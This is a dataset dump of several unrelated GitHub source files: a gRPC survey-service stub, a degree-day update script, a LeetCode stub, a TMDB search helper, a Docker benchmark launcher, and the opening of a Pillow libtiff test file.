max_stars_repo_path
stringlengths 4
305
| max_stars_repo_name
stringlengths 4
130
| max_stars_count
int64 0
191k
| id
stringlengths 1
8
| content
stringlengths 6
1.02M
| score
float64 -1.16
4.16
| int_score
int64 0
4
|
---|---|---|---|---|---|---|
ondewo/survey/survey_pb2_grpc.py | ondewo/ondewo-survey-client-python | 0 | 12797208 | # Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
from ondewo.survey import survey_pb2 as ondewo_dot_survey_dot_survey__pb2
class SurveysStub(object):
"""///// Services ///////
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.CreateSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/CreateSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.CreateSurveyRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
)
self.GetSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/GetSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
)
self.UpdateSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/UpdateSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.UpdateSurveyRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
)
self.DeleteSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/DeleteSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.DeleteSurveyRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.ListSurveys = channel.unary_unary(
'/ondewo.survey.Surveys/ListSurveys',
request_serializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysResponse.FromString,
)
self.GetSurveyAnswers = channel.unary_unary(
'/ondewo.survey.Surveys/GetSurveyAnswers',
request_serializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyAnswersRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
)
self.GetAllSurveyAnswers = channel.unary_unary(
'/ondewo.survey.Surveys/GetAllSurveyAnswers',
request_serializer=ondewo_dot_survey_dot_survey__pb2.GetAllSurveyAnswersRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
)
self.CreateAgentSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/CreateAgentSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
)
self.UpdateAgentSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/UpdateAgentSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
response_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
)
self.DeleteAgentSurvey = channel.unary_unary(
'/ondewo.survey.Surveys/DeleteAgentSurvey',
request_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class SurveysServicer(object):
"""///// Services ///////
"""
def CreateSurvey(self, request, context):
"""Create a Survey and an empty NLU Agent for it
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSurvey(self, request, context):
"""Retrieve a Survey message from the Database and return it
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateSurvey(self, request, context):
"""Update an existing Survey message from the Database and return it
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteSurvey(self, request, context):
"""Delete a survey and its associated agent (if existent)
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListSurveys(self, request, context):
"""Returns the list of all surveys in the server
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSurveyAnswers(self, request, context):
"""Retrieve answers to survey questions collected in interactions with a survey agent for a specific session
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAllSurveyAnswers(self, request, context):
"""Retrieve all answers to survey questions collected in interactions with a survey agent in any session
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def CreateAgentSurvey(self, request, context):
"""Populate and configures an NLU Agent from a Survey
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateAgentSurvey(self, request, context):
"""Update an NLU agent from a survey
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteAgentSurvey(self, request, context):
"""Deletes all data of an NLU agent associated to a survey
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SurveysServicer_to_server(servicer, server):
rpc_method_handlers = {
'CreateSurvey': grpc.unary_unary_rpc_method_handler(
servicer.CreateSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.CreateSurveyRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.Survey.SerializeToString,
),
'GetSurvey': grpc.unary_unary_rpc_method_handler(
servicer.GetSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.Survey.SerializeToString,
),
'UpdateSurvey': grpc.unary_unary_rpc_method_handler(
servicer.UpdateSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.UpdateSurveyRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.Survey.SerializeToString,
),
'DeleteSurvey': grpc.unary_unary_rpc_method_handler(
servicer.DeleteSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.DeleteSurveyRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'ListSurveys': grpc.unary_unary_rpc_method_handler(
servicer.ListSurveys,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.ListSurveysResponse.SerializeToString,
),
'GetSurveyAnswers': grpc.unary_unary_rpc_method_handler(
servicer.GetSurveyAnswers,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.GetSurveyAnswersRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.SerializeToString,
),
'GetAllSurveyAnswers': grpc.unary_unary_rpc_method_handler(
servicer.GetAllSurveyAnswers,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.GetAllSurveyAnswersRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.SerializeToString,
),
'CreateAgentSurvey': grpc.unary_unary_rpc_method_handler(
servicer.CreateAgentSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.SerializeToString,
),
'UpdateAgentSurvey': grpc.unary_unary_rpc_method_handler(
servicer.UpdateAgentSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.FromString,
response_serializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.SerializeToString,
),
'DeleteAgentSurvey': grpc.unary_unary_rpc_method_handler(
servicer.DeleteAgentSurvey,
request_deserializer=ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'ondewo.survey.Surveys', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Surveys(object):
"""///// Services ///////
"""
@staticmethod
def CreateSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/CreateSurvey',
ondewo_dot_survey_dot_survey__pb2.CreateSurveyRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/GetSurvey',
ondewo_dot_survey_dot_survey__pb2.GetSurveyRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/UpdateSurvey',
ondewo_dot_survey_dot_survey__pb2.UpdateSurveyRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.Survey.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/DeleteSurvey',
ondewo_dot_survey_dot_survey__pb2.DeleteSurveyRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def ListSurveys(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/ListSurveys',
ondewo_dot_survey_dot_survey__pb2.ListSurveysRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.ListSurveysResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetSurveyAnswers(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/GetSurveyAnswers',
ondewo_dot_survey_dot_survey__pb2.GetSurveyAnswersRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def GetAllSurveyAnswers(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/GetAllSurveyAnswers',
ondewo_dot_survey_dot_survey__pb2.GetAllSurveyAnswersRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.SurveyAnswersResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def CreateAgentSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/CreateAgentSurvey',
ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def UpdateAgentSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/UpdateAgentSurvey',
ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
ondewo_dot_survey_dot_survey__pb2.AgentSurveyResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def DeleteAgentSurvey(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/ondewo.survey.Surveys/DeleteAgentSurvey',
ondewo_dot_survey_dot_survey__pb2.AgentSurveyRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
| 1.03125 | 1 |
update_dd.py | alanmitchell/update-degree-days | 0 | 12797216 | <reponame>alanmitchell/update-degree-days<gh_stars>0
#!/usr/local/bin/python3.6
"""Script that adds monthly heating degree day values to a pickled
Pandas DataFrame with the path 'data/degree_days.pkl' (compression = 'bz2').
It also saves the DataFrame as a CSV file at 'data/degree_days.csv'. The
new degree-day information comes from the AHFC BMON site, https://bms.ahfc.us .
This script is typically run from a Cron job that schedules the script to
run on the first day of the month so that the prior month's degree days will
be available. Dont' run the script late in the month or a partial month
may be prematurely added to the DataFrame because it satisfies the
MIN_COVERAGE check described below.
This script assumes the pickled DataFrame already exists and has the
following format:
month hdd60 hdd65
station
PAED 2018-02-01 1257.648675 1397.648675
PAED 2018-03-01 1028.027773 1183.027773
The index is the National Weather Service 4-letter station code. The
'month' column is a first-of-the-month date identifying the month whose
degree-days are shown. 'hdd60' and 'hdd65' are the heating degree-day
values: the first is base 60 degree F values and the second is base 65
deg F values.
This script will acquire temperature data from the AHFC BMON site in order
to calculate the degree-days for the most recent months not already
present in the DataFrame. All stations found in the index of the DataFrame
will be updated. The script assumes that the BMON sensor ID for a
weather station's temperature data is the 4-letter station code with '_temp'
appended, e.g. 'PAMR_temp'.
The MIN_COVERAGE constant in the script controls the minimum amount of data
coverage a month must have before being included. Missing data is filled
in with the average value for the rest of the hours that do have data.
-----------------------------------
NOTES ON UTILIZING THE DATA
To read this DataFrame back into a Python script, you can excecute the
following if the DataFrame is available on a local drive:
import pandas as pd
df = pd.read_pickle('degree_days.pkl', compression='bz2')
If the file is located on a web server, you can read it with the following
code:
import pandas as pd
import requests
from io import BytesIO
b = requests.get('http://ahfc.webfactional.com/data/degree_days.pkl').content
d = pd.read_pickle(BytesIO(b), compression='bz2')
Once you have a DataFrame, you can extract that portion of the DataFrame that
applies to one site by:
df_one_site = df.loc['PAMR']
or
df_one_site = df.query("station == 'PAMR'")
(slower than above technique)
To extract one site with a subset of the months:
df_one_site = df.query("station == 'PAMR' and month >= '2018-01-01'")
"""
from os.path import dirname, join, realpath
import sys
from datetime import datetime, timedelta
import pandas as pd
import requests
# Minimum fraction of the hours in a month that must have data in order
# to include the month.
MIN_COVERAGE = 0.7
print('\nScript Start: {}'.format(datetime.now().ctime()))
# path to this directory
APP_PATH = dirname(realpath(__file__))
# URL to the AHFC BMON site API
BMON_URL = 'https://bms.ahfc.us/api/v1/readings/{}/'
def dd_for_site(stn, start_date):
"""Returns a Pandas Dataframe of monthly heating degree-day values for
'stn' (a NWS weather site code). Degree days start in the month
that 'start_date' (Python date/time object)
falls in and continue through the end of available
data. In the returned DataFrame, the index
has a timestamp for each month returned, that being the first day
of the month. The columns of the DataFrame are "hdd65" and "hdd60"
to designate base 65 F degree-days and base 60 F degree-days.
Temperature data used to calculate degree-days comes from the AHFC
BMON site.
Missing hours are assumed to not deviate from the average of the
data present. The column 'coverage' indicates the fraction of
the months hours that actually have data.
"""
# get beginning of month
st_dt_1 = start_date.replace(day=1, hour=0, minute=0, second=0, microsecond=0)
params = {
'start_ts': st_dt_1.strftime('%Y-%m-%d'),
'averaging': '1H'
}
sensor_id = '{}_temp'.format(stn)
resp = requests.get(BMON_URL.format(sensor_id), params=params).json()
if resp['status']=='success':
df = pd.DataFrame(resp['data']['readings'], columns=['ts', 'temp'])
df.set_index('ts', inplace=True)
df.index = pd.to_datetime(df.index)
# calculate the percentage of each month that has data
dfc = df.resample('1M').count()
dfc['total_hours'] = [i.day * 24 for i in dfc.index] # index is last day of the month
dfc['coverage'] = dfc.temp / dfc.total_hours
# Now back to the main dataframe to calc degree-days
df['hdd60'] = [(60.0 - x)/24.0 if x<60.0 else 0.0 for x in df.temp]
df['hdd65'] = [(65.0 - x)/24.0 if x<65.0 else 0.0 for x in df.temp]
df.drop(['temp'], axis=1, inplace=True)
dfm = df.resample('1M').mean()
dfm['coverage'] = dfc.coverage
dfm['hdd60'] = dfm.hdd60 * dfc.total_hours
dfm['hdd65'] = dfm.hdd65 * dfc.total_hours
# Convert index timestamps to beginning of the month
mos = [datetime(d.year, d.month, 1) for d in dfm.index]
dfm.index = mos
dfm.index.name = 'month'
else:
raise ValueError(str(resp['data']))
return dfm
if __name__ == '__main__':
df_exist = pd.read_pickle(join(APP_PATH, 'data/degree_days.pkl'), compression='bz2')
# list of new DataFrames to add to the existing one
new_dfs = []
for stn in df_exist.index.unique():
print('Processing {}: '.format(stn), end='')
try:
# get last month present for this station
last_mo = df_exist.loc[stn].month.max()
# get a date in the following month
next_mo = last_mo + timedelta(days=32) # could be a DST change in there; add 32 days to be safe
# get degree days for missing months
df_new = dd_for_site(stn, next_mo).query('coverage > @MIN_COVERAGE').copy()
if len(df_new):
# put this DataFrame in a form that can be concatenated to the existing one
df_new.reset_index(inplace=True)
df_new.index = [stn] * len(df_new)
df_new.index.name = 'station'
df_new.drop(columns=['coverage'], inplace=True)
# add it to the list of new DataFrames to eventually add to the
# degree-day DataFrame
new_dfs.append(df_new)
print('{} new months'.format(len(df_new)))
else:
print()
except:
print('{}: {}'.format(*sys.exc_info()[:2]))
# Create a new DataFrame that combines the existing data with the new.
df_final = pd.concat([df_exist] + new_dfs)
# get it sorted by station and month
df_final.reset_index(inplace=True)
df_final.sort_values(['station', 'month'], inplace=True)
df_final.set_index('station', inplace=True)
# Save the DataFrame as a compressed pickle and a CSV file.
df_final.to_pickle(join(APP_PATH, 'data/degree_days.pkl'), compression='bz2', protocol=4)
df_final.to_csv(join(APP_PATH, 'data/degree_days.csv'))
| 2.328125 | 2 |
easy/python3/c0050_204_count-primes/00_leetcode_0050.py | drunkwater/leetcode | 0 | 12797224 | <gh_stars>0
# DRUNKWATER TEMPLATE(add description and prototypes)
# Question Title and Description on leetcode.com
# Function Declaration and Function Prototypes on leetcode.com
#204. Count Primes
#Description:
#Count the number of prime numbers less than a non-negative number, n.
#Credits:
#Special thanks to @mithmatt for adding this problem and creating all test cases.
#class Solution:
# def countPrimes(self, n):
# """
# :type n: int
# :rtype: int
# """
# Time Is Money | 2.640625 | 3 |
app/search.py | S4G4R/tv-tracker | 0 | 12797232 | <gh_stars>0
import tmdbsimple as tmdb
def search_movie(title):
"""
Connects to API to search for a specific movie by title.
"""
search = tmdb.Search()
response = search.movie(query=title)
return search.results
def search_tv(title):
"""
Connects to API to search for a specific tv show by title.
"""
search = tmdb.Search()
response = search.tv(query=title)
return search.results
def search_by_id(id, type):
"""
Connects to API to search for a specific movie or show by id.
"""
if type == 'tv':
result = tmdb.TV(id)
else :
result = tmdb.Movies(id)
return result.info()
| 1.851563 | 2 |
benchmarks/launch_benchmark.py | s1113950/models | 0 | 12797240 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: EPL-2.0
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import glob
import os
import signal
import subprocess
import sys
from argparse import ArgumentParser
from common import base_benchmark_util
class LaunchBenchmark(base_benchmark_util.BaseBenchmarkUtil):
"""Launches benchmarking job based on the specified args """
def main(self):
args, unknown = self.parse_args(sys.argv[1:])
try:
self.validate_args(args)
except (IOError, ValueError) as e:
print("\nError: {}".format(e))
sys.exit(1)
self.run_docker_container(args)
def parse_args(self, args):
super(LaunchBenchmark, self).define_args()
# Additional args that are only used with the launch script
arg_parser = ArgumentParser(
parents=[self._common_arg_parser],
description="Parse args for benchmark interface")
arg_parser.add_argument(
"--docker-image", help="Specify the docker image/tag to use",
dest="docker_image", default=None, required=True)
arg_parser.add_argument(
"--debug", help="Launches debug mode which doesn't execute "
"start.sh", action="store_true")
return arg_parser.parse_known_args(args)
def validate_args(self, args):
"""validate the args"""
# validate the shared args first
super(LaunchBenchmark, self).validate_args(args)
# Check for spaces in docker image
if ' ' in args.docker_image:
raise ValueError("docker image string "
"should not have whitespace(s)")
# validate that we support this framework by checking folder names
benchmark_dir = os.path.dirname(os.path.realpath(__file__))
if glob.glob("{}/*/{}".format(benchmark_dir, args.framework)) == []:
raise ValueError("The specified framework is not supported: {}".
format(args.framework))
# if neither benchmark_only or accuracy_only are specified, then enable
# benchmark_only as the default
if not args.benchmark_only and not args.accuracy_only:
args.benchmark_only = True
def run_docker_container(self, args):
"""
Runs a docker container with the specified image and environment
variables to start running the benchmarking job.
"""
benchmark_scripts = os.path.dirname(os.path.realpath(__file__))
intelai_models = os.path.join(benchmark_scripts, os.pardir, "models")
if args.model_name:
# find the path to the model's benchmarks folder
search_path = os.path.join(
benchmark_scripts, "*", args.framework, args.model_name,
args.mode, args.precision)
matches = glob.glob(search_path)
if len(matches) > 1:
# we should never get more than one match
raise ValueError("Found multiple model locations for {} {} {}"
.format(args.framework,
args.model_name,
args.precision))
elif len(matches) == 0:
raise ValueError("No model was found for {} {} {}"
.format(args.framework,
args.model_name,
args.precision))
# use the benchmarks directory path to find the use case
dir_list = matches[0].split("/")
# find the last occurrence of framework in the list
framework_index = len(dir_list) - 1 - dir_list[::-1].index(
args.framework)
# grab the use case name from the path
use_case = str(dir_list[framework_index - 1])
# find the intelai_optimized model directory
optimized_model_dir = os.path.join(
benchmark_scripts, os.pardir, "models", use_case,
args.framework, args.model_name)
# if we find an optimized model, then we will use that path
if os.path.isdir(intelai_models):
intelai_models = optimized_model_dir
mount_benchmark = "/workspace/benchmarks"
mount_external_models_source = "/workspace/models"
mount_intelai_models = "/workspace/intelai_models"
workspace = os.path.join(mount_benchmark, "common", args.framework)
mount_output_dir = False
output_dir = os.path.join(workspace, 'logs')
if args.output_dir != "/models/benchmarks/common/tensorflow/logs":
# we don't need to mount log dir otherwise since default is workspace folder
mount_output_dir = True
output_dir = args.output_dir
in_graph_dir = os.path.dirname(args.input_graph) if args.input_graph \
else ""
in_graph_filename = os.path.basename(args.input_graph) if \
args.input_graph else ""
env_vars = ["--env", "DATASET_LOCATION_VOL={}".format(args.data_location),
"--env", "CHECKPOINT_DIRECTORY_VOL={}".format(args.checkpoint),
"--env", "EXTERNAL_MODELS_SOURCE_DIRECTORY={}".format(args.model_source_dir),
"--env", "INTELAI_MODELS={}".format(intelai_models),
"--env", "BENCHMARK_SCRIPTS={}".format(benchmark_scripts),
"--env", "SOCKET_ID={}".format(args.socket_id),
"--env", "MODEL_NAME={}".format(args.model_name),
"--env", "MODE={}".format(args.mode),
"--env", "PRECISION={}".format(args.precision),
"--env", "VERBOSE={}".format(args.verbose),
"--env", "BATCH_SIZE={}".format(args.batch_size),
"--env", "WORKSPACE={}".format(workspace),
"--env", "IN_GRAPH=/in_graph/{}".format(in_graph_filename),
"--env", "MOUNT_BENCHMARK={}".format(mount_benchmark),
"--env", "MOUNT_EXTERNAL_MODELS_SOURCE={}".format(mount_external_models_source),
"--env", "MOUNT_INTELAI_MODELS_SOURCE={}".format(mount_intelai_models),
"--env", "USE_CASE={}".format(use_case),
"--env", "FRAMEWORK={}".format(args.framework),
"--env", "NUM_CORES={}".format(args.num_cores),
"--env", "NUM_INTER_THREADS={}".format(args.num_inter_threads),
"--env", "NUM_INTRA_THREADS={}".format(args.num_intra_threads),
"--env", "DATASET_LOCATION=/dataset",
"--env", "CHECKPOINT_DIRECTORY=/checkpoints",
"--env", "BENCHMARK_ONLY={}".format(args.benchmark_only),
"--env", "ACCURACY_ONLY={}".format(args.accuracy_only),
"--env", "OUTPUT_RESULTS={}".format(args.output_results),
"--env", "NOINSTALL=False",
"--env", "OUTPUT_DIR={}".format(output_dir)]
# by default we will install, user needs to set NOINSTALL=True
# manually after they get into `--debug` mode
# since they need to run one time without this flag
# to get stuff installed
# Add custom model args as env vars
for custom_arg in args.model_args:
if "=" not in custom_arg:
raise ValueError("Expected model args in the format "
"`name=value` but received: {}".
format(custom_arg))
env_vars.append("--env")
env_vars.append("{}".format(custom_arg))
# Add proxy to env variables if any set on host
for environment_proxy_setting in [
"http_proxy",
"ftp_proxy",
"https_proxy",
"no_proxy",
]:
if not os.environ.get(environment_proxy_setting):
continue
env_vars.append("--env")
env_vars.append("{}={}".format(
environment_proxy_setting,
os.environ.get(environment_proxy_setting)
))
volume_mounts = ["--volume", "{}:{}".format(benchmark_scripts, mount_benchmark),
"--volume", "{}:{}".format(args.model_source_dir, mount_external_models_source),
"--volume", "{}:{}".format(intelai_models, mount_intelai_models),
"--volume", "{}:/dataset".format(args.data_location),
"--volume", "{}:/checkpoints".format(args.checkpoint),
"--volume", "{}:/in_graph".format(in_graph_dir)]
if mount_output_dir:
volume_mounts.extend([
"--volume", "{}:{}".format(output_dir, output_dir)])
docker_run_cmd = ["docker", "run"]
# only use -it when debugging, otherwise we might get TTY error
if args.debug:
docker_run_cmd.append("-it")
docker_run_cmd = docker_run_cmd + env_vars + volume_mounts + [
"--privileged", "-u", "root:root", "-w",
workspace, args.docker_image, "/bin/bash"]
if not args.debug:
docker_run_cmd.append("start.sh")
if args.verbose:
print("Docker run command:\n{}".format(docker_run_cmd))
self._run_docker_cmd(docker_run_cmd)
def _run_docker_cmd(self, docker_run_cmd):
"""runs docker proc and exits on ctrl c"""
p = subprocess.Popen(docker_run_cmd, preexec_fn=os.setsid)
try:
p.communicate()
except KeyboardInterrupt:
os.killpg(os.getpgid(p.pid), signal.SIGKILL)
if __name__ == "__main__":
util = LaunchBenchmark()
util.main()
| 1.492188 | 1 |
GUI/printer/Pillow-2.7.0/Tests/test_file_libtiff.py | y-gupta/rfid-auth-system | 5 | 12797248 | from helper import unittest, PillowTestCase, hopper, py3
import os
import io
from PIL import Image, TiffImagePlugin
class LibTiffTestCase(PillowTestCase):
def setUp(self):
codecs = dir(Image.core)
if "libtiff_encoder" not in codecs or "libtiff_decoder" not in codecs:
self.skipTest("tiff support not available")
def _assert_noerr(self, im):
"""Helper tests that assert basic sanity about the g4 tiff reading"""
# 1 bit
self.assertEqual(im.mode, "1")
# Does the data actually load
im.load()
im.getdata()
try:
self.assertEqual(im._compression, 'group4')
except:
print("No _compression")
print (dir(im))
# can we write it back out, in a different form.
out = self.tempfile("temp.png")
im.save(out)
class TestFileLibTiff(LibTiffTestCase):
def test_g4_tiff(self):
"""Test the ordinary file path load path"""
file = "Tests/images/hopper_g4_500.tif"
im = Image.open(file)
self.assertEqual(im.size, (500, 500))
self._assert_noerr(im)
def test_g4_large(self):
file = "Tests/images/pport_g4.tif"
im = Image.open(file)
self._assert_noerr(im)
def test_g4_tiff_file(self):
"""Testing the string load path"""
file = "Tests/images/hopper_g4_500.tif"
with open(file, 'rb') as f:
im = Image.open(f)
self.assertEqual(im.size, (500, 500))
self._assert_noerr(im)
def test_g4_tiff_bytesio(self):
"""Testing the stringio loading code path"""
file = "Tests/images/hopper_g4_500.tif"
s = io.BytesIO()
with open(file, 'rb') as f:
s.write(f.read())
s.seek(0)
im = Image.open(s)
self.assertEqual(im.size, (500, 500))
self._assert_noerr(im)
def test_g4_eq_png(self):
""" Checking that we're actually getting the data that we expect"""
png = Image.open('Tests/images/hopper_bw_500.png')
g4 = Image.open('Tests/images/hopper_g4_500.tif')
self.assert_image_equal(g4, png)
# see https://github.com/python-pillow/Pillow/issues/279
def test_g4_fillorder_eq_png(self):
""" Checking that we're actually getting the data that we expect"""
png = Image.open('Tests/images/g4-fillorder-test.png')
g4 = Image.open('Tests/images/g4-fillorder-test.tif')
self.assert_image_equal(g4, png)
def test_g4_write(self):
"""Checking to see that the saved image is the same as what we wrote"""
file = "Tests/images/hopper_g4_500.tif"
orig = Image.open(file)
out = self.tempfile("temp.tif")
rot = orig.transpose(Image.ROTATE_90)
self.assertEqual(rot.size, (500, 500))
rot.save(out)
reread = Image.open(out)
self.assertEqual(reread.size, (500, 500))
self._assert_noerr(reread)
self.assert_image_equal(reread, rot)
self.assertEqual(reread.info['compression'], 'group4')
self.assertEqual(reread.info['compression'], orig.info['compression'])
self.assertNotEqual(orig.tobytes(), reread.tobytes())
def test_adobe_deflate_tiff(self):
file = "Tests/images/tiff_adobe_deflate.tif"
im = Image.open(file)
